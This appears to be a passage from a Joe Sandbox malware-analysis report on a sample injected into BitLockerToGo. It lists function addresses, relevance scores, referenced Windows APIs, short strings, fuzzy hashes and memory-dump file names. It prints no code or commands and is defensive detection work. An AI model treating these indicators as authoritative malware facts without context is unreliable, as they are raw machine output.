Opcode Fuzzy Hash: 46c1aa7e3d4783c8cafb10b447e6cf667811d2f710046e441ac2e275ad7d108f
Instruction Fuzzy Hash: 8142E8B240EB808AD320EF64C64639FBEE1BFA1746F058C5DD1D987242E6788149CF67

Function 026D3888 Relevance: 4.0, Strings: 3, Instructions: 249COMMON

Download Yara Rule

Strings

4`[b, xrefs: 026D3650
D, xrefs: 026D3582
4`[b, xrefs: 026D3800

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$D
API String ID: 0-2855741908
Opcode ID: 5bf96b50ee6853955a857ac06b7a230bf3afe0413783ab604ca1e2d521818aa5
Instruction ID: 0e6fbe4f710d0dc0ec0ff91147447851c1c3c6d22eb9bfdcf5d8c563d3107116
Opcode Fuzzy Hash: 5bf96b50ee6853955a857ac06b7a230bf3afe0413783ab604ca1e2d521818aa5
Instruction Fuzzy Hash: 03814874A18380EBD3188F55D4A0B2BBBE5FF85744F60991CE2C647390C7759865CF86

Function 026E285E Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 306fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,3BF239E3,00000000), ref: 026E2BBE

Strings

4`[b, xrefs: 026E2CB0

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: CopyFile
String ID: 4`[b
API String ID: 1304948518-3962175265
Opcode ID: 59777ef8a4d6c5935df66cd78e11b4101dfbdd24cd7c4f2980d069bb5cda54b1
Instruction ID: 3115e55fca6bcd785569c517141a54e3633470248a8d45830204c4ff7a4626b4
Opcode Fuzzy Hash: 59777ef8a4d6c5935df66cd78e11b4101dfbdd24cd7c4f2980d069bb5cda54b1
Instruction Fuzzy Hash: 43B188B0E0122ACBDF24CFA5C9A17AEB772FF86304F144698D95A2B391DB741A40CF55

Function 026C6E80 Relevance: 3.3, Strings: 2, Instructions: 809COMMON

Download Yara Rule

Strings

8, xrefs: 026C77B5
0, xrefs: 026C77BD

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: ebb0a9c1d307696b28629256f91972a4c9b222890c1ace8d0ca7ba5e7953b91c
Instruction ID: 8d542720949c92d4746ab59f2d6d2041bbb6cab2c271138fc88ece3516b142ee
Opcode Fuzzy Hash: ebb0a9c1d307696b28629256f91972a4c9b222890c1ace8d0ca7ba5e7953b91c
Instruction Fuzzy Hash: CB7248716083409FD715DF18C880BAABBE6EF88358F14892DF9998B391D375D948CF92

Function 026FDC70 Relevance: 3.3, Strings: 2, Instructions: 794COMMON

Download Yara Rule

Strings

%7, xrefs: 026FE1D0
%7, xrefs: 026FE786, 026FE726

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %7$%7
API String ID: 0-3114740580
Opcode ID: 705125ad38d0295e63b40fc982c04cfd2b4d46d058a67c4057bfee49d0d034be
Instruction ID: 1cb4f135fb4a3b99a98ba69c0a4e3891b6dc65697c57fc9836ed3c181e3b4506
Opcode Fuzzy Hash: 705125ad38d0295e63b40fc982c04cfd2b4d46d058a67c4057bfee49d0d034be
Instruction Fuzzy Hash: 9142DE31A08206CFCB44CF28D8D06AEB7F2FF89314F19896DD585A7395D731A925CB92

Function 026EBADA Relevance: 3.3, APIs: 2, Instructions: 261COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 026EBAE4
VariantInit.OLEAUT32 ref: 026EBAF7

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: b55d15bf5edd91ad75b30fe957d81c6ff57fdd282cf55e5806e01efc77a8916c
Instruction ID: 38ddd7d17274aa4906c975968a92219e112b8dcb98df30a0102af5a1661c5551
Opcode Fuzzy Hash: b55d15bf5edd91ad75b30fe957d81c6ff57fdd282cf55e5806e01efc77a8916c
Instruction Fuzzy Hash: 99B158B250E7C19ADB28EF64951479FBAE2AFA0385F058C2DD0C98B341E7788544CB97

Function 026D5E62 Relevance: 3.3, Strings: 2, Instructions: 752COMMON

Download Yara Rule

Strings

^Y, xrefs: 026D62FB
)uw, xrefs: 026D62AE

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )uw$^Y
API String ID: 0-636218314
Opcode ID: 3126d070d8ff8e7583ed2337983909d0121faad4cdee19716890e816b7c67ab6
Instruction ID: 3d1569aba49e0291b78ca46548b9bd83ed198842d1c619d9ccf6a584116888fe
Opcode Fuzzy Hash: 3126d070d8ff8e7583ed2337983909d0121faad4cdee19716890e816b7c67ab6
Instruction Fuzzy Hash: 3522CFB0D0021A8BDB24CF18C8A2BBBB7B1FF55314F69864CD8569F395E335A941CB94

Function 026F0EAE Relevance: 3.2, APIs: 2, Instructions: 237COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 026F0EB6
VariantInit.OLEAUT32 ref: 026F0EC2

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: c9b632cd36d9397d9fa90ca2affcac2c487f614db9451329b89744d014452def
Instruction ID: 6324d726ef0ffb6f4abb2d15d5cc2c4a304bfd3f42ea9e667f81771d3cd16efb
Opcode Fuzzy Hash: c9b632cd36d9397d9fa90ca2affcac2c487f614db9451329b89744d014452def
Instruction Fuzzy Hash: 0AA120B191A3808AD701BF749A4530E7EB1EF5234AF0A895CD8C94B316E675C61CDFA3

Function 026EE8D7 Relevance: 3.2, APIs: 2, Instructions: 230COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 026EE8DF
VariantInit.OLEAUT32 ref: 026EE8EB

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: ce1728f68399fbff672d3ea6e7ad5860ca8c9132f7698c032408768b90015667
Instruction ID: 0a63f5fb2f56390f46c573c224437929a18630a7a0a8b673b4c4407b1e6bb663
Opcode Fuzzy Hash: ce1728f68399fbff672d3ea6e7ad5860ca8c9132f7698c032408768b90015667
Instruction Fuzzy Hash: BCA130B191A3808AD701BF749A4530EBEB1EF52346F4A895CD8C94B316E674C51CDFA3

Function 026EC9B7 Relevance: 3.2, APIs: 2, Instructions: 195COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 026EC9C1
VariantInit.OLEAUT32 ref: 026EC9D4

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 2a22c483f882a8e9b9fe01fdcd56661fbd383afc0842e18581e5613df6bcdc0b
Instruction ID: 0e3a33735dd9b030a5a8b26d4d4f2962b73ce92a548a5f2ae879bfbb89f2e7e1
Opcode Fuzzy Hash: 2a22c483f882a8e9b9fe01fdcd56661fbd383afc0842e18581e5613df6bcdc0b
Instruction Fuzzy Hash: E291D5B140E7C08ED361AFB4CA0538FBEE1AF61746F89880DE0D88B242D7748549DB97

Function 026ED056 Relevance: 3.2, APIs: 2, Instructions: 182COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 026ED060
VariantInit.OLEAUT32 ref: 026ED073

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: c7045682c908a7ba42ad7555590a817c04b968ed93202713b66c9c5bc65a51e0
Instruction ID: 3b04fd18b476052c4828a9ee54a4eda7441f10c6a1a7abcccf4a8dc2de789974
Opcode Fuzzy Hash: c7045682c908a7ba42ad7555590a817c04b968ed93202713b66c9c5bc65a51e0
Instruction Fuzzy Hash: 1F91BBB550E3858AD300AFB4C60935FBAF2AFA2745F158C2DE1E88B252C6748548CF97

Function 026FDF90 Relevance: 3.1, Strings: 2, Instructions: 626COMMON

Download Yara Rule

Strings

%7, xrefs: 026FE1D0
%7, xrefs: 026FE786, 026FE726

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %7$%7
API String ID: 0-3114740580
Opcode ID: 0aa53ddc5d2d1673e1acb2ba872ce86e7e8d5db7fe9219342baa3a831ebb4872
Instruction ID: ae9ff5afe72dde18c5a509645483eeab363156c343a1eb1187f32711cb9541ff
Opcode Fuzzy Hash: 0aa53ddc5d2d1673e1acb2ba872ce86e7e8d5db7fe9219342baa3a831ebb4872
Instruction Fuzzy Hash: F122F071A04216CFCB04CF68D8D06AEBBF2FF89304F19896DD981A7385D732A915CB91

Function 026FE080 Relevance: 3.1, Strings: 2, Instructions: 621COMMON

Download Yara Rule

Strings

%7, xrefs: 026FE1D0
%7, xrefs: 026FE786, 026FE726

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %7$%7
API String ID: 0-3114740580
Opcode ID: 60e8b9bf1b5da67b64f56c45bfa458c27e64fe10954680d2a9e42b179839ec71
Instruction ID: 9c28e2edce0c731f625135d29e3c799c89676d57b4eb462f4700c150c5f8d794
Opcode Fuzzy Hash: 60e8b9bf1b5da67b64f56c45bfa458c27e64fe10954680d2a9e42b179839ec71
Instruction Fuzzy Hash: A622F271A04216CFCB08CF68D4906AEBBF2FFC9304F19896DC981A7395D736A915CB91

Function 026FB050 Relevance: 3.1, Strings: 2, Instructions: 575COMMON

Download Yara Rule

Strings

476, xrefs: 026FB1D6
476, xrefs: 026FB089

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 476$476
API String ID: 0-1821123138
Opcode ID: 343ac6feaa07717b2203ffbbd1596891ad862081b86fc9383a92a7c6d15766b1
Instruction ID: 61c9cc7f531f9afb48937abd0faaee5e1659c70d2fbc67f3496b7de41a04788d
Opcode Fuzzy Hash: 343ac6feaa07717b2203ffbbd1596891ad862081b86fc9383a92a7c6d15766b1
Instruction Fuzzy Hash: 3E128B716093419FCB55CF28C890B2EBBE2BBC8718F188A2CE6D587395D735E815CB52

Function 026DC660 Relevance: 2.9, Strings: 2, Instructions: 447COMMON

Download Yara Rule

Strings

xy, xrefs: 026DC682
4`[b, xrefs: 026DCAF0

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$xy
API String ID: 0-3861070957
Opcode ID: 40f250f89f3c26c0e31e3068364bbc91aa5a2ccd09ae6c3bfae3544ac09bd300
Instruction ID: 9833e3ff392b0609a156327396dacf9171f41b7f9f5e356562a0b46d9e1081c6
Opcode Fuzzy Hash: 40f250f89f3c26c0e31e3068364bbc91aa5a2ccd09ae6c3bfae3544ac09bd300
Instruction Fuzzy Hash: 65D1EE719082089BD714EF18C891B2BBBF1EF85754F18481EE5C68B391E735E911CBA7

Function 026C63E0 Relevance: 2.9, Strings: 2, Instructions: 434COMMON

Download Yara Rule

Strings

IEND, xrefs: 026C687D
), xrefs: 026C645D

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: defcce2577abdc7142ce7d9b808e76c3df097c0350169119e8c4c96126623133
Instruction ID: 7abeba3e8e27aa835608f05e5af171fea998a5ec1b86bd0f6edccf50dbc3f54b
Opcode Fuzzy Hash: defcce2577abdc7142ce7d9b808e76c3df097c0350169119e8c4c96126623133
Instruction Fuzzy Hash: ABF1E1B1A087119FD314EF28C85572ABBE4FB84314F248A2DE9999B3C1D774E914CBC6

Function 026E11B0 Relevance: 2.9, Strings: 2, Instructions: 374COMMON

Download Yara Rule

Strings

4`[b, xrefs: 026E1CA0
A@, xrefs: 026E1A47

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$A@
API String ID: 0-3080864223
Opcode ID: c6631c862786011fb10c74aaa54509500eb7cac274aaba7e3e9b78a89e9810c2
Instruction ID: c806616f0be4dda727e849060102e7584824ed65d8df4fbf27d01797060d1d6b
Opcode Fuzzy Hash: c6631c862786011fb10c74aaa54509500eb7cac274aaba7e3e9b78a89e9810c2
Instruction Fuzzy Hash: C3C1CAB0D01218DFEF14CFA5D995BAEBB71FF02300F5084A9D60AAB285DB305A59CF91

Function 026DF862 Relevance: 2.7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

WP, xrefs: 026DF6EB
4`[b, xrefs: 026DF690

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$WP
API String ID: 0-3062752364
Opcode ID: c001fc18364b9ceff08a9a375e7cc648a6a1a112e07800fb0d2b9a4da99579cc
Instruction ID: 20aedd0849971d5936e4bd3034da401220e474eea58d43576e8d68bc0fc18ac0
Opcode Fuzzy Hash: c001fc18364b9ceff08a9a375e7cc648a6a1a112e07800fb0d2b9a4da99579cc
Instruction Fuzzy Hash: AD612174908381CBD324CF24C590AABB7E2FF89704F689A1DE5CA87665DB70D805CB92

Function 026FD470 Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

@, xrefs: 026FD3BD
476, xrefs: 026FD2E6

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 476$@
API String ID: 0-1619901514
Opcode ID: eb630a604752647abc05f6e224b283b89c09245cda028b925739c4502bebdfac
Instruction ID: 8cb41050bc23f940d163d502cd2fe2af86060dfea2fd177dce90042f50d6732c
Opcode Fuzzy Hash: eb630a604752647abc05f6e224b283b89c09245cda028b925739c4502bebdfac
Instruction Fuzzy Hash: 835137B06193008FD758DF28C49172AB7F2FF9A708F04992CE2C98B365D73AA415DB56

Function 026F23DD Relevance: 2.6, Strings: 1, Instructions: 1370COMMON

Download Yara Rule

Strings

4, xrefs: 026F3B29

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 0b0edc8c89c7d6611d383ade6a96d651498256ef03acb7cf2f690ba660712ef8
Instruction ID: 6ec2af2a65e091b3d4e3bce27d2f9c68db23dfbf0fc2e080d5d984dd3fc6d08a
Opcode Fuzzy Hash: 0b0edc8c89c7d6611d383ade6a96d651498256ef03acb7cf2f690ba660712ef8
Instruction Fuzzy Hash: 02C22DB1C1E2848AD710BBB4EE0534EBEB1EF5130AF4548ADC5985B342E6744A5CDFA3

Function 026DCDED Relevance: 2.2, APIs: 1, Instructions: 707COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7fd3f643989822673d26dcac27f6d143e04aff2042705cdfcda9e54e99aead3
Instruction ID: 6fbf9123ff2f0f05ca702a844ac6c3747a66ae9d5d21d411ed46269d8acfe0f5
Opcode Fuzzy Hash: b7fd3f643989822673d26dcac27f6d143e04aff2042705cdfcda9e54e99aead3
Instruction Fuzzy Hash: 1132D171A49205DFC714CF28D8D072AB3E2FF89308F99892CE5859B385DB75E825CB91

Function 026DC400 Relevance: 1.7, APIs: 1, Instructions: 246comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(02701538,00000000,00000001,02701528), ref: 026DC429

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 803c908157dd9ec7f68f1433bce47a848b0c7ced5b1e8164021b8e96c480e307
Instruction ID: caae81a438a2eaed68604588bb00abf75547f8e179eacbdd27b0f4d4e9235d7c
Opcode Fuzzy Hash: 803c908157dd9ec7f68f1433bce47a848b0c7ced5b1e8164021b8e96c480e307
Instruction Fuzzy Hash: 6D51B1B1A4020C9BD7249F64CC96BB773A4EF86368F084659FA85CB390F774E845C761

Function 026ED9EB Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 026ED9F5

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 6353b176a508a75b56a613e8194a1cc9409df0c8bd0e2a5615fdb968c94bd407
Instruction ID: fda3fb1de1f07009862f11d67b0c03c16483b2615c2b1c3790eef044911f122c
Opcode Fuzzy Hash: 6353b176a508a75b56a613e8194a1cc9409df0c8bd0e2a5615fdb968c94bd407
Instruction Fuzzy Hash: 2271C67260E7508FC718AF28C85035EBBE2AFD5354F098D2DE8EACB381D6758805CB46

Function 026E9A49 Relevance: 1.7, Strings: 1, Instructions: 420COMMON

Download Yara Rule

Strings

0<1, xrefs: 026E9B37

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
